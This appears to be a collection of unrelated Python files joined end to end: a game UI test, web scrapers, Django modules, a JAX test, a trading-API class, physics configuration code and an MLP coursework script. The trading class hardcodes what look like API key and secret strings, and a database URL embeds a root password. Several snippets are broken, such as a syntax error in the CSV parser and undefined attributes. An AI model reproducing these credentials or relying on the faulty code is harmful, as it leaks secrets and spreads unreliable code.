freeze_poco("ActiveBtn").click()
common.printgreen("伙伴界面按钮点击正常")
except Exception as e:
common.printred("伙伴界面按钮点击流程异常")
common.printred(e)
common.get_screen_shot(start, time.time(), devices, "伙伴界面按钮点击流程异常")
try:
print("测试A级伙伴的数量")
poco("item1").child("selected").click()
for i in range(len(poco("WrapContent").child())):
PetGroup = "PetGroup" + str(i)
poco(PetGroup).click()
count = len(poco("MonsterpreferenceDlg(Clone)").child("ItemListPanel").child("Bg1").child("Icons").offspring("Item"))
if count == 4:
uiname = poco(PetGroup).child("Name").get_text()
common.printgreen(f"{uiname}的伙伴一共有4个")
else:
common.printred(f"{uiname}的伙伴少了,只出现了{count}个")
common.get_screen_shot(start, time.time(), devices, "遍历伙伴数量异常")
print("测试B级伙伴的数量")
poco("item2").child("selected").click()
for i in range(len(poco("WrapContent").child())):
PetGroup = "PetGroup" + str(i)
poco(PetGroup).click()
count = len(poco("MonsterpreferenceDlg(Clone)").child("ItemListPanel").child("Bg1").child("Icons").offspring("Item"))
if count == 3:
uiname = poco(PetGroup).child("Name").get_text()
common.printgreen(f"{uiname}的伙伴一共有4个")
else:
common.printred(f"{uiname}的伙伴少了,只出现了{count}个")
common.get_screen_shot(start, time.time(), devices, "遍历伙伴数量异常")
except Exception as e:
common.printred("遍历伙伴数量异常,详情见截图")
common.printred(e)
common.get_screen_shot(start, time.time(), devices, "遍历伙伴数量异常")
else:
common.printred("伙伴界面报错,详情见截图")
common.get_screen_shot(start, time.time(), devices, "伙伴界面报错")
poco("Close").click()
return poco("Duck").get_name() # 返回值poco("Duck").get_name()
def check_menu(sysmenu, poco):
position = poco(sysmenu).get_position()
if position[0] > 0.88: # 对比pos点,得到的pos列表中,第一个元素 > 1 说明在屏幕外面
poco("MenuSwitchBtn").click()
time.sleep(1)
poco(sysmenu).click()
else:
poco(sysmenu).click()
# devices = "127.0.0.1:62001"
# monster(devices) |
"""
# -*- coding: utf-8 -*-
# 写代码是热爱,写到世界充满爱!
# @Author:AI悦创 @DateTime :2019/10/1 13:13 @Function :数据库连接 Development_tool :PyCharm
# code is far away from bugs with the god animal protecting
I love animals. They taste delicious.
┏┓ ┏┓
┏┛┻━━━┛┻┓
┃ ☃ ┃
┃ ┳┛ ┗┳ ┃
┃ ┻ ┃
┗━┓ ┏━┛
┃ ┗━━━┓
┃ 神兽保佑 ┣┓
┃ 永无BUG! ┏┛
┗┓┓┏━┳┓┏┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛
"""
from sqlalchemy import create_engine
ngine = create_engine(
"mysql+pymysql://root:123456@127.0.0.1:3306/test",# (里面的 root 要填写你的密码),注意:mysql+pymysql 之间不要加空格
# "mysql + pymysql://root:root@localhost/test",
max_overflow = 5, # 超过连接池大小之后,外最多可以创建的链接
pool_size = 10, # 连接池大小
echo = True, # 调试信息展示
) |
from lxml import html
import requests
domain = 'https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/speechcon-reference'
page = requests.get(domain)
tree = html.fromstring(page.content)
responce = tree.xpath('//audio/@title')
print(responce)
|
from django.conf.urls import url
from .views import (
SubjectListAPIView,
SubjectCreateAPIView,
SubjectDetailAPIView
)
urlpatterns = [
url(r'^$', SubjectListAPIView.as_view(), name='list'),
url(r'^create/$', SubjectCreateAPIView.as_view(), name='create'),
url(r'^(?P<id>\d+)/$', SubjectDetailAPIView.as_view(), name='detail'),
]
|
# -*- coding: utf-8 -*-
# @File : get_info_jd.py
# @Author: KingJX
# @Date : 2019/1/19
""""""
import requests
import json
from lxml import etree
def get_url_page(url):
"""
获取页面信息
:param url: 传入页面地址
:return:
"""
headers = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"
}
response = requests.get(url, headers=headers)
if response.status_code == 200:
text = response.content.decode('GBK')
return text
return None
def parse_page():
url = 'https://item.jd.com/3290987.html'
html = get_url_page(url)
print(html)
etree_html = etree.HTML(html)
info = {}
# 获取好评率
comm = etree_html.xpath('.//div[@class="percent-con"]')
return comm
def get_name_price(url_1):
# 构造价格数据URL
num = url_1.split('/')[-1].split('.')[0]
url = 'https://c.3.cn/recommend?callback=handleComboCallback&methods=accessories&p=103003&sku=%s' % num
url += '&cat=670%2C671%2C672&lid=1&uuid=572822970&pin=&ck=pin%2CipLocation%2Catw%2Caview&lim=5&cuuid=572822970&csid=122270672.7.572822970%7C27.1547907196&_=1547910477315'
html = get_url_page(url)
goods_info = html.split('handleComboCallback(')[1][:-1]
json_goods = json.loads(goods_info)
# 获取商品名称
name = json_goods['accessories']['data']['wName']
# 获取商品价格
price = json_goods['accessories']['data']['wMaprice']
dict_info = {}
dict_info['name'] = name
dict_info['price'] = price
return dict_info
def main():
url = input('请输入要解析的商品地址:')
goods_info = get_name_price(url)
print("商品名称为:", goods_info['name'])
print('商品价格为:', goods_info['price'])
if __name__ == '__main__':
main()
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for `utils/predict.py`."""
from absl.testing import absltest
from jax import test_util as jtu
from jax.api import device_get
from jax.api import jit
from jax.config import config
from jax.lib import xla_bridge
from tensorflow.python.ops import numpy_ops as np
import jax.random as random
from neural_tangents.utils import utils
config.parse_flags_with_absl()
class UtilsTest(jtu.JaxTestCase):
def testIsOnCPU(self):
for dtype in [np.float32, np.float64]:
with self.subTest(dtype=dtype):
def x():
return random.normal(random.PRNGKey(1), (2, 3), dtype)
def x_cpu():
return device_get(random.normal(random.PRNGKey(1), (2, 3), dtype))
x_jit = jit(x)
# x_cpu_jit = jit(x_cpu)
x_cpu_jit_cpu = jit(x_cpu, backend='cpu')
self.assertTrue(utils.is_on_cpu(x_cpu()))
# TODO(mattjj): re-enable this when device_put under jit works
# self.assertTrue(utils.is_on_cpu(x_cpu_jit()))
self.assertTrue(utils.is_on_cpu(x_cpu_jit_cpu()))
if xla_bridge.get_backend().platform == 'cpu':
self.assertTrue(utils.is_on_cpu(x()))
self.assertTrue(utils.is_on_cpu(x_jit()))
else:
self.assertFalse(utils.is_on_cpu(x()))
self.assertFalse(utils.is_on_cpu(x_jit()))
if __name__ == '__main__':
absltest.main()
|
1391. Check if There is a Valid Path in a Grid
Given a m x n grid. Each cell of the grid represents a street. The street of grid[i][j] can be:
1 which means a street connecting the left cell and the right cell.
2 which means a street connecting the upper cell and the lower cell.
3 which means a street connecting the left cell and the lower cell.
4 which means a street connecting the right cell and the lower cell.
5 which means a street connecting the left cell and the upper cell.
6 which means a street connecting the right cell and the upper cell.
You will initially start at the street of the upper-left cell (0,0). A valid path in the grid is a path which starts from the upper left cell (0,0) and ends at the bottom-right cell (m - 1, n - 1). The path should only follow the streets.
Notice that you are not allowed to change any street.
Return true if there is a valid path in the grid or false otherwise.
Example 1:
Input: grid = [[2,4,3],[6,5,2]]
Output: true
Explanation: As shown you can start at cell (0, 0) and visit all the cells of the grid to reach (m - 1, n - 1).
Example 2:
Input: grid = [[1,2,1],[1,2,1]]
Output: false
Explanation: As shown you the street at cell (0, 0) is not connected with any street of any other cell and you will get stuck at cell (0, 0)
Input: grid = [[1,1,2]]
Output: false
Explanation: You will get stuck at cell (0, 1) and you cannot reach cell (0, 2).
Input: grid = [[1,1,1,1,1,1,3]]
Output: true
Input: grid = [[2],[2],[2],[2],[2],[2],[6]]
Output: true
Constraints:
m == grid.length
n == grid[i].length
1 <= m, n <= 300
1 <= grid[i][j] <= 6
|
from alpaca_trade_api.rest import REST,TimeFrame
import pandas as pd
class Mercado:
def __init__(self, agent_hodings: dict, agent_cash: dict, api_key: str, secret_key: str, live: bool) -> None:
"""
A class used to represent an Animal
...
Attributes
----------
api_key : str
secret_key : str
agent_holdings : dict
agent_cash : dict
live : bool
Define is the bot is going to trade on real time or simulation(ACTIVATE IT WHEN BACKTESTING).
"""
self.api_key = api_key
self.secret_key = secret_key
self.agent_holdings = agent_hodings
self.agent_cash = agent_cash
self.live = live
self.api_account = REST('AKCLP03YEDI2RURGO9WF', '2N7SbDGOgzknPKs1f5QanvQkp7R6qySjenzC7o8a')
def fetch_stock_data(self, init_date: str, end_date: str, tickers: list, period = 1.0) -> pd.DataFrame:
"""
Fetches data from ALPACA MARKETS
NOTE : period is meaused in seconds,so:
1 Minute = 60 Seconds
1 Day = 3600 Seconds
1 Month = 216,000 Seconds
1 Year = 12,960,000 Seconds
Parameters
----------
init_date: str
Initial Date of fetching data.
end_date: str
Final Date of fectching data.
tickers: list
List of tickers names.
period: float
Time-lapse of fetch.
Returns
-------
`pd.DataFrame`
7 columns: A date, open, high, low, close, volume and tick symbol
for the specified stock ticker
"""
# Download and save the data in a pandas DataFrame:
data_df = pd.DataFrame()
for tic in self.ticker_list:
temp_df = self.api.get_bars(tic, TimeFrame.Day, self.start_date , self.end_date, adjustment='raw').df
temp_df["tic"] = tic
data_df = data_df.append(temp_df)
# reset the index, we want to use numbers as index instead of dates
data_df = data_df.reset_index()
try:
# convert the column names to standardized names
data_df.columns = [
"date",
"open",
"high",
"low",
"close",
"volume",
"trade_count",
"vwap",
'tic'
]
# use adjusted close price instead of close price
#data_df["close"] = data_df["adjcp"]
# drop the adjusted close price column
data_df = data_df.drop("trade_count", 1)
data_df = data_df.drop("vwap", 1)
except NotImplementedError:
print("the features are not supported currently")
# create day of the week column (monday = 0)
data_df["day"] = data_df["date"].dt.dayofweek
# convert date to standard string format, easy to filter
data_df["date"] = data_df.date.apply(lambda x: x.strftime("%Y-%m-%d"))
# drop missing data
data_df = data_df.dropna()
data_df = data_df.reset_index(drop=True)
print("Shape of DataFrame: ", data_df.shape)
# print("Display DataFrame: ", data_df.head())
data_df = data_df.sort_values(by=['date','tic']).reset_index(drop=True)
return data_df
def trade(self, tickers: dict) -> None:
pass
def fetch_real_time(self, tickers: list) -> None:
pass
def _check_status(self) -> None:
pass
def stop(self) -> None:
pass
|
from TinhToan import giaTriTheoKhuc
from MayInNhanh import *
# Tính thử về lợi nhuận
daySoLuong = [1,50,100,150,200]
dayLoiNhuan = [50,60,70,80,90]
#print(giaTriTheoKhuc(daySoLuong, dayLoiNhuan, 52))
#1). Dữ liệu cơ bản 01 hớ số lượng bắt đầu 1
daySoLuongCB01 = [1,50,100,150,200,250,300,350,400,450,500,550,600,650,700,750,800,850,900,950]
dayLoiNhuanCB01 = [30,65,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68]
#2). Dãy lợi nhuận cần cạnh tranh 2
day_so_luong_cb2 = [1, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750, 800, 850, 900, 950]
day_loi_nhuan_cb2 = [50, 50, 50 , 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50, 50]
'''Cạnh tranh nên xem sao'''
#2). Dữ liệu cơ bản cho 1000 trang đến 10000 trang (tối đa công suất 1 máy trong ngày)
#daySoLuongCB02 = [950,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500,6000,6500,7000,7500,8000,8500,9000,9500,10000]
#dayLoiNhuanCB02 = [68,63, 62, 61, 60, 68, 69, 67, 66, 65, 64, 63, 62, 61, 60, 58, 56, 54, 52, 50]
'''Mức này đang lãi như Kprint'''
##tinh thử ngày 10/08/2017
"""Tính hình thị trường có thể giảm"""
daySoLuongCB02 = [950,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500,6000,6500,7000,7500,8000,8500,9000,9500,10000]
dayLoiNhuanCB02 = [68,65, 63, 61, 60, 59, 58, 57, 56, 55, 54, 53, 52, 51, 50, 49, 48, 47, 46, 45]
#cung cấp dữ liệu để tính dựa trên thông tin hiện tại
dayTrang01 = [50,100,150,200,250,300,350,400,450,500,550,600,650,700,750,800,850,900,950,999]
dayTrang02 = [950,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500,6000,6500,7000,7500,8000,8500,9000,9500,10000]
mayin01 = MayInDigi(450, 760000, 0.08, day_so_luong_cb2, day_so_luong_cb2, 1200) #tốc độ 1200 a4/giờ
ty_le_sales_khach_cuoi = 0 #điều chỉnh thử theo An nhân
giaIn01 = GiaInTheoMayToner(mayin01, 0, ty_le_sales_khach_cuoi)
#tính toán 01:
for i in range(0,len(dayTrang02)):
giaIn01.SoTrangA4 = dayTrang01[i]
#print (round(giaIn01.GiaSales())),
# print('SL: {0}, {1}, {2} LN: {3}'.format(giaIn01.SoTrangA4, round(giaIn01.GiaSales()),\
# round(giaIn01.GiaTrangTB()), giaTriTheoKhuc(daySoLuongCB02, dayLoiNhuanCB02,giaIn01.SoTrangA4)))
print('SL: {0}, {1}, {2} LN: {3}'.format(giaIn01.SoTrangA4, round(giaIn01.gia_sales_them()), \
round(giaIn01.gia_TB_trang_sales()),
giaTriTheoKhuc(day_so_luong_cb2, day_loi_nhuan_cb2, \
giaIn01.SoTrangA4)))
#print('{0}'.format(giaTriTheoKhuc(daySoLuongCB01, dayLoiNhuanCB01,50))) |
from django.contrib import admin
from django.utils.safestring import mark_safe
from Profile.models import PostWall, Reviews, LikePost
from mptt.admin import MPTTModelAdmin
@admin.register(PostWall)
class PostWallAdmin(admin.ModelAdmin):
list_display = ('id', 'des', 'user', 'get_image')
def get_image(self, obj):
if obj.image:
return mark_safe(f'<img src={obj.image.url} width="100" height="60" style="margin-left: 0px;" ')
else:
return None
get_image.short_description = "Изображение"
get_image.allow_tags = True
@admin.register(Reviews)
class ReviewsAdmin(admin.ModelAdmin):
list_display = ('text', 'user', 'get_parent')
def get_parent(self, obj):
if obj.parent:
return obj.parent
else:
return None
admin.site.register(LikePost)
|
import FWCore.ParameterSet.Config as cms
# define all the changes for unganging ME1a
def unganged_me1a(process):
### CSC geometry customization:
#from Configuration.StandardSequences.GeometryDB_cff import *
if not process.es_producers_().has_key('idealForDigiCSCGeometry'):
process.load('Geometry.CSCGeometryBuilder.cscGeometryDB_cfi')
process.load('Geometry.CSCGeometryBuilder.idealForDigiCscGeometryDB_cff')
process.CSCGeometryESModule.useGangedStripsInME1a = False
process.idealForDigiCSCGeometry.useGangedStripsInME1a = False
### Digitizer customization:
if 'simMuonCSCDigis' not in process.producerNames():
process.load('SimMuon.CSCDigitizer.muonCSCDigis_cfi')
## Make sure there's no bad chambers/channels
#process.simMuonCSCDigis.strips.readBadChambers = True
#process.simMuonCSCDigis.wires.readBadChannels = True
#process.simMuonCSCDigis.digitizeBadChambers = True
## Customized timing offsets so that ALCTs and CLCTs times
## are centered in signal BX. The offsets below were tuned for the case
## of 3 layer pretriggering and median stub timing algorithm.
process.simMuonCSCDigis.strips.bunchTimingOffsets = cms.vdouble(0.0,
37.53, 37.66, 55.4, 48.2, 54.45, 53.78, 53.38, 54.12, 51.98, 51.28)
process.simMuonCSCDigis.wires.bunchTimingOffsets = cms.vdouble(0.0,
22.88, 22.55, 29.28, 30.0, 30.0, 30.5, 31.0, 29.5, 29.1, 29.88)
#done
return process
# CSC geometry customization:
def unganged_me1a_geometry(process):
process.CSCGeometryESModule.useGangedStripsInME1a = False
process.idealForDigiCSCGeometry.useGangedStripsInME1a = False
return process
# CSC digitizer customization
def digitizer_timing_pre3_median(process):
## Make sure there's no bad chambers/channels
#process.simMuonCSCDigis.strips.readBadChambers = True
#process.simMuonCSCDigis.wires.readBadChannels = True
#process.simMuonCSCDigis.digitizeBadChambers = True
## Customized timing offsets so that ALCTs and CLCTs times are centered in signal BX.
## These offsets below were tuned for the case of 3 layer pretriggering
## and median stub timing algorithm.
process.simMuonCSCDigis.strips.bunchTimingOffsets = cms.vdouble(0.0,
37.53, 37.66, 55.4, 48.2, 54.45, 53.78, 53.38, 54.12, 51.98, 51.28)
process.simMuonCSCDigis.wires.bunchTimingOffsets = cms.vdouble(0.0,
22.88, 22.55, 29.28, 30.0, 30.0, 30.5, 31.0, 29.5, 29.1, 29.88)
return process
# pick up upgrade condions data directly from DB tags using ESPrefer's
def customise_csc_cond_ungangedME11A_mc(process):
myconds = [
('CSCDBGainsRcd', 'CSCDBGains_ungangedME11A_mc'),
('CSCDBNoiseMatrixRcd', 'CSCDBNoiseMatrix_ungangedME11A_mc'),
('CSCDBCrosstalkRcd', 'CSCDBCrosstalk_ungangedME11A_mc'),
('CSCDBPedestalsRcd', 'CSCDBPedestals_ungangedME11A_mc'),
('CSCDBGasGainCorrectionRcd', 'CSCDBGasGainCorrection_ungangedME11A_mc'),
('CSCDBChipSpeedCorrectionRcd', 'CSCDBChipSpeedCorrection_ungangedME11A_mc')
]
from CalibMuon.Configuration.getCSCConditions_frontier_cff import cscConditions
for (classname, tag) in myconds:
print classname, tag
sourcename = 'unganged_' + classname
process.__setattr__(sourcename, cscConditions.clone())
process.__getattribute__(sourcename).toGet = cms.VPSet( cms.PSet( record = cms.string(classname), tag = cms.string(tag)) )
process.__getattribute__(sourcename).connect = cms.string('frontier://FrontierProd/CMS_COND_CSC_000')
process.__setattr__('esp_' + classname, cms.ESPrefer("PoolDBESSource", sourcename) )
del cscConditions
return process
# Adjust L1Extra producer's input tags
def customize_l1extra(process):
l1ep = process.l1extraParticles
#l1ep.centralBxOnly = cms.bool(True)
#l1ep.produceMuonParticles = cms.bool(True)
#l1ep.produceCaloParticles = cms.bool(False)
#l1ep.ignoreHtMiss = cms.bool(False)
l1ep.muonSource = cms.InputTag('simGmtDigis')
l1ep.etTotalSource = cms.InputTag('simGctDigis')
l1ep.nonIsolatedEmSource = cms.InputTag('simGctDigis','nonIsoEm')
l1ep.etMissSource = cms.InputTag('simGctDigis')
l1ep.forwardJetSource = cms.InputTag('simGctDigis','forJets')
l1ep.centralJetSource = cms.InputTag('simGctDigis','cenJets')
l1ep.tauJetSource = cms.InputTag('simGctDigis','tauJets')
l1ep.isolatedEmSource = cms.InputTag('simGctDigis','isoEm')
l1ep.etHadSource = cms.InputTag('simGctDigis')
l1ep.htMissSource = cms.InputTag("simGctDigis")
l1ep.hfRingEtSumsSource = cms.InputTag("simGctDigis")
l1ep.hfRingBitCountsSource = cms.InputTag("simGctDigis")
return process
def customise_csc_geom_cond_digi(process):
process = unganged_me1a_geometry(process)
# process = customise_csc_cond_ungangedME11A_mc(process)
process = digitizer_timing_pre3_median(process)
return process
|
#!/usr/bin/python
import os
import sys
import glob
map = {
'Professional': 'STND',
'People': 'PEPL',
'Planner': 'PLNR',
}
for name in ['STND', 'PEPL', 'PLNR']:
deb = glob.glob('/home/tualatrix/Sources/pagico/%s/*.deb' % name)[0]
new_deb = deb.replace('karmic1', name)
os.system('mv %s %s' % (deb, new_deb))
os.system('scp %s %s' % (new_deb, sys.argv[1]))
|
import datetime
create_time=datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(create_time)
print(type(create_time))
data={}
print(data["img"]) |
import csv
def inputParse(file):
f = open(file)
reader = csv.reader(f)
headers = reader.next()
summary = {}
pat_index = headers.index('DESYNPUF_ID')
claim_index = headers.index('CLM_PMT_AMT')
diag1_index = headers.index('ICD9_DGNS_CD_1')
diag2_index = headers.index('ICD9_DGNS_CD_2')
diag3_index = headers.index('ICD9_DGNS_CD_3')
diag4_index = headers.index('ICD9_DGNS_CD_4')
diag5_index = headers.index('ICD9_DGNS_CD_5')
diag6_index = headers.index('ICD9_DGNS_CD_6')
diag7_index = headers.index('ICD9_DGNS_CD_7')
diag8_index = headers.index('ICD9_DGNS_CD_8')
diag9_index = headers.index('ICD9_DGNS_CD_9')
diag10_index = headers.index('ICD9_DGNS_CD_10')
all_chronic = [diag1_index, diag2_index, diag3_index, diag4_index, diag5_index, diag6_index, diag7_index, diag8_index, diag9_index, diag10_index]
for visit in reader:
index = 0
while index < 9:
if visit[all_chronic[index]] == '':
pass
else:
# print visit[pat_index], visit[all_chronic[index]], visit[claim_index]
visit_diag = visit[all_chronic[index]]
if visit_diag not in summary:
summary[visit_diag] = {}
summary[visit_diag][]
index += 1
#print visit[patient], visit[claim
if __name__=='__main__':
f = "DE1_0_2008_to_2010_Inpatient_Claims_Sample_1.csv"
inputParse(f)
|
# Generated by Django 2.2.5 on 2019-09-14 22:41
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mesfactory', '0001_initial'),
]
operations = [
migrations.AlterModelTable(
name='factory',
table='factory',
),
migrations.AlterModelTable(
name='line',
table='line',
),
migrations.AlterModelTable(
name='station',
table='Station',
),
migrations.AlterModelTable(
name='workshop',
table='workshop',
),
]
|
import sys
import numpy as np
import random
import matplotlib.pyplot as plt
## change Path ##
sys.path.append("/home/elkin/university/gradSchool/Fall2020/CS472/CS472")
from tools import arff, splitData, generatePerceptronData, graph_tools,list2csv
import itertools
import mlp
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder
print("PART 1")
print("DATA SET 1")
arff_path = r"training/linsep2nonorigin.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = False
MOMENTUM = 0.5
VALIDATION_SIZE = 0.0
HOTENCODING = True
# data = [[0,0],[0,1]]
# BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, hidden_layer_widths =[2,2,2] ,validationSize = VALIDATION_SIZE, allWeightsValue = 0)
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE, allWeightsValue = 0,isHotEncoding= HOTENCODING)
BClass.fit(data,labels)
scores = BClass.score(data,labels)
print("Score ", scores)
# print("Weights")
# print(BClass.get_weights())
list2csv.write_to_csv(BClass.get_weights(),"weightsP1D1.csv")
# clf = MLPClassifier(hidden_layer_sizes=(4,), activation = 'logistic',solver = 'sgd',alpha = MOMENTUM,learning_rate_init = LR, max_iter=2,shuffle = SHUFFLE).fit(data, labels)
print("DATA SET 2")
arff_path = r"training/data_banknote_authentication.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE, allWeightsValue = 0)
BClass.fit(data,labels)
scores = BClass.score(data,labels)
print("Score ", scores)
# print("Weights")
# print(BClass.get_weights())
list2csv.write_to_csv(BClass.get_weights(),"evaluation.csv")
print("")
print("PART 2 IRIS DATA SET")
arff_path = r"training/iris.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
save_path="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/MSEvsAccuracyIRIS"
save_path3="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/MSE_ValidationTrain"
data_train,data_test , labels_train, labels_test = train_test_split(data, labels, test_size=0.25)
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = True
MOMENTUM = 0.5
VALIDATION_SIZE = 0.25
HOTENCODING = True
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE, isHotEncoding= HOTENCODING)
BClass.fit(data_train,labels_train)
print("Number of Epochs to run ", BClass.get_numberEpochs())
scores = BClass.score(data,labels)
print("Score ", scores)
# print("Weights")
# # print(BClass.get_weights())
mse_epochs_val, mse_epochs_training = BClass.get_mse_epochs()
accuracy_epochs = BClass.get_accuracy_epochs()
number_epochs = a_list = list(range(1, BClass.get_numberEpochs()+1))
""" GRAPHS MSE VALIDATION"""
plot_list = []
fig, ax1 = plt.subplots()
ax1.title.set_text('MSE and Accuracy % in Validation and Training Set ')
color = 'tab:red'
ax1.set_xlabel('Number of Epochs')
ax1.set_ylabel('Accuracy % Val Set', color=color)
plot_list.append(ax1.plot(number_epochs, accuracy_epochs, color=color, label = "% Accuracy validation set")[0])
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('MSE sets') # we already handled the x-label with ax1
# ax2.plot(number_epochs, mse_epochs_val, color=color,label = "MSE validation set")
plot_list.append(ax2.plot(number_epochs, mse_epochs_val, color=color,label = "MSE validation set")[0])
# ax2.tick_params(axis='y', labelcolor=color)
ax3 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:green'
# ax3.plot(number_epochs, mse_epochs_training, color=color, label ="MSE training set")
plot_list.append(ax3.plot(number_epochs, mse_epochs_training, color=color, label ="MSE training set")[0])
# ax3.tick_params(axis='y', labelcolor=color)
ax1.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), fancybox=True, shadow=False, ncol=5, handles=plot_list,
facecolor = 'white', edgecolor = 'black')
fig.tight_layout() # otherwise the right y-label is slightly clipped
# plt.show()
fig.savefig(save_path)
""" GRAPHS MSE BOTH"""
fig, ax1 = plt.subplots()
ax1.title.set_text('MSE Validation and Training Set')
color = 'tab:red'
ax1.set_xlabel('Number of Epochs')
ax1.set_ylabel('MSE Validation Set', color=color)
ax1.plot(number_epochs, mse_epochs_val, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('MSE Training Set', color=color) # we already handled the x-label with ax1
ax2.plot(number_epochs, mse_epochs_training, color=color)
ax2.tick_params(axis='y', labelcolor=color)
fig.tight_layout() # otherwise the right y-label is slightly clipped
# plt.show()
fig.savefig(save_path3)
print("")
print("PART 3 VOWEL DATASET")
arff_path = r"training/vowel.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
data = data[:, [0,1,3,4,5,6,7,8,9,10,11,12]]
save_path="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/vowelMSE"
save_path2="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/vowelEpochs"
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = True
MOMENTUM = 0.5
VALIDATION_SIZE = 0.1
HOTENCODING = True
# BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE,isHotEncoding= HOTENCODING)
# BClass.fit(data_train,labels_train)
# print("Number of Epochs to run ", BClass.get_numberEpochs())
# scores = BClass.score(data_test,labels_test)
# print("Score ", scores)
LRs = [0.005, 0.01, 0.02,0.05,0.1,0.2,0.5,0.75,0.9,2]
MSEs_Training = []
MSEs_Validation = []
MSEs_Test = []
numberEpochsToStop = []
enc = OneHotEncoder()
for lrx in LRs:
data_train,data_test , labels_train, labels_test = train_test_split(data, labels, test_size=0.25)
BClass = mlp.MLPClassifier(lr = lrx,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE,isHotEncoding= HOTENCODING)
BClass.fit(data_train,labels_train)
numberEpochsToStop.append(BClass.get_numberEpochs())
enc.fit(labels_train)
enc.fit(labels_test)
labels_train_hot = enc.transform(labels_train).toarray()
labels_test_hot = enc.transform(labels_test).toarray()
mse_train = BClass._get_mse_valSet(data_train,labels_train_hot)
mse_val = BClass.getMSEvalSet()
mse_test = BClass._get_mse_valSet(data_test, labels_test_hot)
MSEs_Test.append(mse_test)
MSEs_Training.append(mse_train)
MSEs_Validation.append(mse_val)
x = np.arange(len(LRs)) # the label locations
width = 0.2 # the width of the bars
fig, ax = plt.subplots()
barVal = ax.bar(x - width, MSEs_Validation, width, label='Validation Set')
barTrain = ax.bar(x , MSEs_Training, width, label='Training Set')
barTest = ax.bar(x + width, MSEs_Test, width, label='Test Set')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('MSE')
ax.set_title('Vowel MSE vs. Learning Rate')
ax.set_xticks(x)
ax.set_xticklabels(LRs)
ax.set_xlabel('Learning Rate')
ax.legend()
fig.savefig(save_path)
"""BAR GRAPHS # epochs"""
x = np.arange(len(LRs)) # the label locations
width = 0.35 # the width of the bars
fig, ax = plt.subplots()
numberEpochsStop = ax.bar(x - width/2, numberEpochsToStop, width, label='Epochs')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('# of Epochs to Stop')
ax.set_title('Vowel # Epochs per Learning Rate')
ax.set_xticks(x)
ax.set_xticklabels(LRs)
ax.set_xlabel('Learning Rate')
ax.legend()
fig.savefig(save_path2)
print("")
print("PART 4 VOWEL DATASET")
arff_path = r"training/vowel.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
data = data[:, [0,1,3,4,5,6,7,8,9,10,11,12]]
save_path="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/vowelMSENoded"
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = True
MOMENTUM = 0.5
VALIDATION_SIZE = 0.1
HOTENCODING = True
numberNodes = np.array([2])
ns = 0
numberNodesArray=[]
MSEs_Training = []
MSEs_Validation = []
MSEs_Test = []
numberOfEpochWithNoImprovement= []
bestAccuracy = 0
enc = OneHotEncoder()
while len(numberOfEpochWithNoImprovement) < 1:
numberNodes2 = np.power(numberNodes,ns)
